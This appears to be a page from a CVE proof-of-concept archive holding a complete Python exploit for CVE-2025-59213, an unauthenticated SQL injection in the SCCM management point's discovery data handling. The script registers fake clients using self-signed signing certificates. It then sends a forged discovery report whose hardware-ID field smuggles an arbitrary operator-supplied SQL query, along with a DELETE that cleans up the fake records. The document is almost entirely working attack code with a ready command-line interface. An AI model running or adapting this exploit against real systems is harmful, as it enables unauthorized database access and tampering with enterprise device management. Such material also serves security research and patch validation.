5465 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / CVE-2025-59213.py PY
#!/usr/bin/env python3

import argparse
import datetime
import random
import re
import uuid
import zlib
from time import sleep
from urllib.parse import urlparse

import requests
import urllib3
from cryptography import x509
from cryptography.hazmat.primitives import hashes, serialization
from cryptography.hazmat.primitives.asymmetric import rsa
from cryptography.hazmat.primitives.asymmetric.padding import PKCS1v15
from cryptography.x509 import ObjectIdentifier
from cryptography.x509.oid import NameOID

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

def time1():
    return datetime.datetime.now(datetime.timezone.utc).strftime("%Y-%m-%dT%H:%M:%SZ")

def time2():
    return datetime.datetime.now(datetime.timezone.utc).strftime("%Y%m%d%H%M%S.%f") + "+000"

def time3():
    return datetime.datetime.now(datetime.timezone.utc).strftime("%d/%m/%Y %H:%M:%S")


# from https://github.com/xpn/sccmwtf
class CryptoTools:
    @staticmethod
    def createCertificateForKey(key, cname):
        subject = issuer = x509.Name([
            x509.NameAttribute(NameOID.COMMON_NAME, cname),
        ])
        cert = x509.CertificateBuilder().subject_name(
            subject
        ).issuer_name(
            issuer
        ).public_key(
            key.public_key()
        ).serial_number(
            x509.random_serial_number()
        ).not_valid_before(
            datetime.datetime.now(datetime.timezone.utc) - datetime.timedelta(days=2)
        ).not_valid_after(
            datetime.datetime.now(datetime.timezone.utc) + datetime.timedelta(days=365)
        ).add_extension(
            x509.KeyUsage(digital_signature=True, key_encipherment=False, key_cert_sign=False,
                                  key_agreement=False, content_commitment=False, data_encipherment=True,
                                  crl_sign=False, encipher_only=False, decipher_only=False),
            critical=False,
        ).add_extension(
            # SMS Signing Certificate (Self-Signed)
            x509.ExtendedKeyUsage([ObjectIdentifier("1.3.6.1.4.1.311.101.2"), ObjectIdentifier("1.3.6.1.4.1.311.101")]),
            critical=False,
        ).sign(key, hashes.SHA256())

        return cert

    @staticmethod
    def generateRSAKey():
        key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
        return key

    @staticmethod
    def buildMSPublicKeyBlob(key):
        # Built from spec: https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-mqqb/ade9efde-3ec8-4e47-9ae9-34b64d8081bb
        blobHeader = b"\x06\x02\x00\x00\x00\xA4\x00\x00\x52\x53\x41\x31\x00\x08\x00\x00\x01\x00\x01\x00"
        blob = blobHeader + key.public_key().public_numbers().n.to_bytes(int(key.key_size / 8), byteorder="little")
        return blob.hex().upper()

    # Signs data using SHA256 and then reverses the byte order as per SCCM
    @staticmethod
    def sign(key, data):
        # signature = key.sign(data, PSS(mgf=MGF1(hashes.SHA256()), salt_length=PSS.MAX_LENGTH ), hashes.SHA256())
        signature = key.sign(data, PKCS1v15(), hashes.SHA256())
        signature_rev = bytearray(signature)
        signature_rev.reverse()
        return bytes(signature_rev)

    @staticmethod
    def decrypt(key, data):
        print(key.decrypt(data, PKCS1v15()))

    @staticmethod
    def load_privatekey_from_pem(pem):
        return serialization.load_pem_private_key(pem, password=None)
    
    @staticmethod
    def dump_privatekey_to_pem(key):
        pem = key.private_bytes(
            encoding=serialization.Encoding.PEM,
            format=serialization.PrivateFormat.PKCS8,
            encryption_algorithm=serialization.NoEncryption()
        )
        return pem
    
    @staticmethod
    def dump_cert_to_pem(cert):
        pem = cert.public_bytes(
            encoding=serialization.Encoding.PEM
        )
        return pem
    

class SCCM:

    tpl_multipart = b"--aAbBcCdDv1234567890VxXyYzZ\r\ncontent-type: text/plain; charset=UTF-16\r\n\r\n%b\r\n--aAbBcCdDv1234567890VxXyYzZ\r\ncontent-type: application/octet-stream\r\n\r\n%b\r\n--aAbBcCdDv1234567890VxXyYzZ--"
    
    tpl_ccm_header = """<Msg SchemaVersion="1.1">
    <ID>{ID}</ID>
    <SourceID>{SMSID}</SourceID>
    <SOURCE_HOST>{SOURCE_HOST}</SOURCE_HOST>
    <ReplyTo>direct:dummy:dummy</ReplyTo>
    <TargetHost>{TARGET_HOST}</TargetHost>
    <TargetEndpoint>{TARGET_ENDPOINT}</TargetEndpoint>
    <TargetAddress>mp:{TARGET_ENDPOINT}</TargetAddress>
    <Priority>3</Priority>
    <ReplyTo>direct:dummy:dummy</ReplyTo>
    <Timeout>86400</Timeout>
    <Protocol>http</Protocol>
    <ReplyMode>{REPLY_MODE}</ReplyMode>
    <SentTime>{TIME}</SentTime>
    <Body Type="ByteRange" Offset="0" Length="{LENGTH}"/>{ATTACHMENT}
    <Hooks><Hook3 Name="zlib-compress"/>{CLIENT_AUTH}</Hooks><Payload Type="inline"/>
    <ReplyCapabilities><AllowRegistrationReset>direct:{SOURCE_HOST}:ClientRegistration</AllowRegistrationReset></ReplyCapabilities></Msg>"""

    tpl_hook2_clientauth = """<Hook2 Name="clientauth"><Property Name="AuthSenderMachine">{SOURCE_HOST}</Property><Property Name="HashAlgorithm">1.2.840.113549.1.1.11</Property><Property Name="ClientCapability">NonSSL</Property><Property Name="PayloadSignature">{PayloadSignature}</Property></Hook2>"""
    tpl_attachment_header = """<Attachment Type="ByteRange" Length="{LENGTH}" Name="{NAME}" Offset="{OFFSET}"></Attachment>"""

    # MP_ClientRegistration
    tpl_client_registration_request = """<ClientRegistrationRequest>{DATA}<Signature><SignatureValue>{PAYLOAD_SIGNATURE}</SignatureValue></Signature></ClientRegistrationRequest>""" 

    # <Property Name="FQ Name" Value="{CLIENT_NAME}" />
    tpl_client_registration_data = """<Data HashAlgorithm="1.2.840.113549.1.1.11" SMSID="{SMSID}" RequestType="Registration" TimeStamp="{TIME}" ><AgentInformation AgentIdentity="CCMSetup.exe" AgentVersion="{CLIENT_VERSION}" AgentType="0"/><Certificates><Encryption Encoding="HexBinary" KeyType="1">{encryption}</Encryption><Signing Encoding="HexBinary" KeyType="1">{signature}</Signing></Certificates><DiscoveryProperties><Property Name="Netbios Name" Value="{CLIENT_NAME}" /><Property Name="SMBIOSID" Value="GUID:{SMBIOSID}" /><Property Name="FQ Name" Value="{CLIENT_NAME}" /><Property Name="AgentEdition" Value="0" /><Property Name="Locale ID" Value="2057" /><Property Name="InternetFlag" Value="0" /></DiscoveryProperties></Data>"""

    # MP_DdrEndpoint
    tpl_ddr_report = """<?xml version='1.0' encoding='UTF-16'?>
<Report>
    <ReportHeader>
        <Identification>
            <Machine>
                <ClientInstalled>1</ClientInstalled>
                <ClientType>1</ClientType>
                <ClientID>{SMSID}</ClientID>
                <ClientVersion>{CLIENT_VERSION}</ClientVersion>
                <NetBIOSName>{SOURCE_HOST}</NetBIOSName>
                <CodePage>437</CodePage>
                <SystemDefaultLCID>1033</SystemDefaultLCID>
            </Machine>
        </Identification>
        <ReportDetails>
            <ReportContent>Inventory Data</ReportContent>
            <ReportType>Full</ReportType>
            <Date>{TIME2}</Date>
            <Version>9.0</Version>
            <Format>1.1</Format>
        </ReportDetails>
        <InventoryAction ActionType="Predefined">
            <InventoryActionID>{{00000000-0000-0000-0000-000000000003}}</InventoryActionID>
            <Description>Discovery</Description>
            <InventoryActionLastUpdateTime>{TIME2}</InventoryActionLastUpdateTime>
        </InventoryAction>
    </ReportHeader>
    <ReportBody>
        <Instance ParentClass="CCM_Client" Class="CCM_Client" Namespace="\\\\{SOURCE_HOST}\\ROOT\\ccm" Content="New">
            <CCM_Client>
                <ClientIdChangeDate>{TIME3}</ClientIdChangeDate>
                <PreviousClientId>{OLDSMSID}</PreviousClientId>
            </CCM_Client>
        </Instance>
        <Instance ParentClass="CCM_ClientIdentificationInformation" Class="CCM_ClientIdentificationInformation" Namespace="\\\\{SOURCE_HOST}\\ROOT\\ccm" Content="New">
            <CCM_ClientIdentificationInformation>
                <HardwareID1>{HID}</HardwareID1>
            </CCM_ClientIdentificationInformation>
        </Instance>
    </ReportBody>
</Report>"""


    def __init__(self, target, key, cert, client_sign_key, sqlcmd, altAuth=False, autoClean=True, verbose=False):
        self._target = target
        self._target_url = f"{target}/ccm_system_altauth/request" if altAuth else f"{target}/ccm_system/request"
        self._pkey = key
        self._cert = cert
        # gen and persist cert if one isn't provided via cmdline
        if client_sign_key is None:
            self.signkey = CryptoTools.generateRSAKey()
            keyfname = f'/tmp/sccm_poc.key'
            print(f"[+] Generated new signing key, saved to {keyfname}")
            with open(keyfname, 'wb') as f:
                f.write(CryptoTools.dump_privatekey_to_pem(self.signkey))
        else:
            self.signkey = CryptoTools.load_privatekey_from_pem(open(client_sign_key,'rb').read())
        self.signcert = CryptoTools.createCertificateForKey(self.signkey, u"ConfigMgr Client")
        self.signcert_hex = self.signcert.public_bytes(serialization.Encoding.DER).hex().upper()


        self.SMSID = ""
        self.OLDSMSID = ""
        self.CLIENT_VERSION = random.randint(1, 999) # marker for cleaning

        # clean registered client
        self.auto_clean_cmd = f"delete from System_DISC where Client_Version0='{self.CLIENT_VERSION}';" if autoClean else ''

        # injection vector
        self.HID = f"{self.CLIENT_VERSION}';{self.auto_clean_cmd}{sqlcmd}-- "


        self.TARGET_HOST = urlparse(self._target_url).hostname

        self.SMBIOS_GUID0 = uuid.uuid4().__str__().upper()
        self.verbose = verbose
    

    def _debug(self, m):
        if self.verbose:
            print(m)

    def __ccm_post(self, data):
        headers = {"User-Agent": "ConfigMgr Messaging HTTP Sender", "Content-Type": 'multipart/mixed; boundary="aAbBcCdDv1234567890VxXyYzZ"'}
        
        # self._debug(f">>>> HTTP Request <<<<<\n{data.decode('utf-16-le')}\n")
        r = requests.request("CCM_POST", self._target_url, headers=headers, data=data, verify=False, cert=(self._cert, self._pkey))
        self._debug(f">>>> HTTP Response : {r.status_code} <<<<<\n{r.text}\n")
        return r.content

    def __ccm_messaging_request(self, endpoint, body, attachment=b"", clientSMSID="", clientname="", clientauth=False, isAsync=False):
        MSGID = f'{{{uuid.uuid4().__str__().upper()}}}'
        print(f"[+] CcmMessage : ID={MSGID}")
        final_body = body + attachment + b"\x00\x00"
        compressedbody = zlib.compress(final_body)
        clientsig = ""
        if clientauth:
            print("[+] CcmMessage : adding clientauth")
            clientsig = self.tpl_hook2_clientauth.format(SOURCE_HOST=clientname, PayloadSignature=self.sign(compressedbody))

        attachment_header = ""
        if len(attachment):
            print("[+] CcmMessage : adding attachment")
            attachment_header = self.tpl_attachment_header.format(LENGTH=len(attachment), OFFSET=len(body), NAME="Attachment1")


        ccm_header = self.tpl_ccm_header.format(LENGTH=len(final_body), ID=MSGID, TARGET_HOST=self.TARGET_HOST, TARGET_ENDPOINT=endpoint, REPLY_MODE="Sync" if not isAsync else "Async", TIME=time1(), SMSID=clientSMSID, SOURCE_HOST=clientname, ATTACHMENT=attachment_header, CLIENT_AUTH=clientsig)

        multipart_body = self.tpl_multipart % (ccm_header.encode("utf-16"), compressedbody)

        # self._debug(f">>>> CcmMessaging Header <<<<<\n{ccm_header}\n")
        self._debug(f">>>> CcmMessaging Body <<<<<\n{final_body.decode()}\n")

        return self.__ccm_post(multipart_body)

    def sign(self, data): 
        return CryptoTools.sign(self.signkey, data).hex().upper()


    def register_client(self, clientname):
        self.SOURCE_HOST = clientname
        b = self.signcert.public_bytes(serialization.Encoding.DER).hex().upper()
        
        reg_data = self.tpl_client_registration_data.format(SMSID="", TIME=time1(), CLIENT_NAME=clientname, encryption=self.signcert_hex, signature=self.signcert_hex, SMBIOSID=self.SMBIOS_GUID0, CLIENT_VERSION=self.CLIENT_VERSION)
        sig = self.sign(reg_data.encode('utf-16-le'))
        client_registration_request = self.tpl_client_registration_request.format(DATA=reg_data, PAYLOAD_SIGNATURE=sig)
       
        rsp = self.__ccm_messaging_request('MP_ClientRegistration', body=client_registration_request.encode('utf-16-le'), attachment=b"", clientSMSID=self.SMSID, clientname=self.SOURCE_HOST, clientauth=False)
        deflatedData = zlib.decompress(rsp.split(b'--aAbBcCdDv1234567890VxXyYzZ')[2].split(b'\r\n')[3]).decode('utf-16-le')
        # print(deflatedData)
        r = re.findall("SMSID=\"([^\"]+)\"", deflatedData)
        if r != None:
            SMSID =  r[0]
            print(f"[+] Got SMSID = {SMSID} for new client {clientname}")
            sleep(1)
            return SMSID
        else:
            print("[!] Failed to register client")
            return None

    def send_ddr_report(self, clientname):
        report_attachment = self.tpl_ddr_report.format(SMSID=self.SMSID, OLDSMSID=self.OLDSMSID, HID=self.HID, SOURCE_HOST=self.SOURCE_HOST, CLIENT_VERSION=self.CLIENT_VERSION, TIME2=time2(), TIME3=time3())

        print(f'[+] Sending DDR report: SMSID={self.SMSID} OLDSMSID={self.OLDSMSID}')
        rsp = self.__ccm_messaging_request('MP_DdrEndpoint', body=b"", attachment=report_attachment.encode('utf-16-le'), clientSMSID=self.SMSID, clientname=self.SOURCE_HOST, clientauth=True, isAsync=True)
        if 'NoReply'.encode('utf-16-le') in rsp :
            print('[+] DDR report sent successfully')

    def exploit(self, clientname, delay=10):
        assert delay >= 2
        self.SMSID = self.register_client(clientname)

        # create new cert to force a new SMSID (new versions)
        self.signcert = CryptoTools.createCertificateForKey(self.signkey, u"ConfigMgr Client")
        self.signcert_hex = self.signcert.public_bytes(serialization.Encoding.DER).hex().upper()

        self.OLDSMSID = self.register_client(clientname)

        assert self.SMSID != self.OLDSMSID

        # mandatory 
        sleep(delay)

        self.send_ddr_report(clientname)


if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="CVE-2025-59213 - Discovery Data Manager (DDM) Unauthenticated SQL Injection")  
    parser.add_argument("-t", "--target", action="store", required=True, default=None, help="Target (http://sccm-mp.local/)") 
    parser.add_argument("-sk", "--sigkey", action="store", required=False, default=None, help="SMS signature key (automatically generated if omitted)")
    parser.add_argument("-k", "--key", action="store", required=False, default=None, help="Private key file for mTLS")
    parser.add_argument("-c", "--cert", action="store", required=False, default=None, help="Certificate file for mTLS")
    parser.add_argument("-v", "--verbose", action="store_true", required=False, default=False, help="Verbose output, print requests")
    parser.add_argument("-cn", "--client-name", action="store", required=True, default=False, help="Name of the client that will be created in SCCM")
    parser.add_argument("-rs", "--registration-sleep", action="store", required=False, default=10, help="The amount of time, in seconds, that should be waited after registrating a new device (2 seconds by default)")
    parser.add_argument("-a", "--altauth", action="store_true", required=False, default=False, help="Use the MP's alternate authentication endpoint")
    parser.add_argument("-sql", action="store", required=True, default=None, help="Query to execute through the SQL injection")
    parser.add_argument("-nc", "--no-clean", action="store_true", required=False, default=None, help="Do not automatically clean the registred devices")
   
    options = parser.parse_args()
    
    SCCM(options.target, options.key, options.cert, options.sigkey, options.sql, altAuth=options.altauth, autoClean=(not options.no_clean), verbose=options.verbose).exploit(options.client_name, int(options.registration_sleep))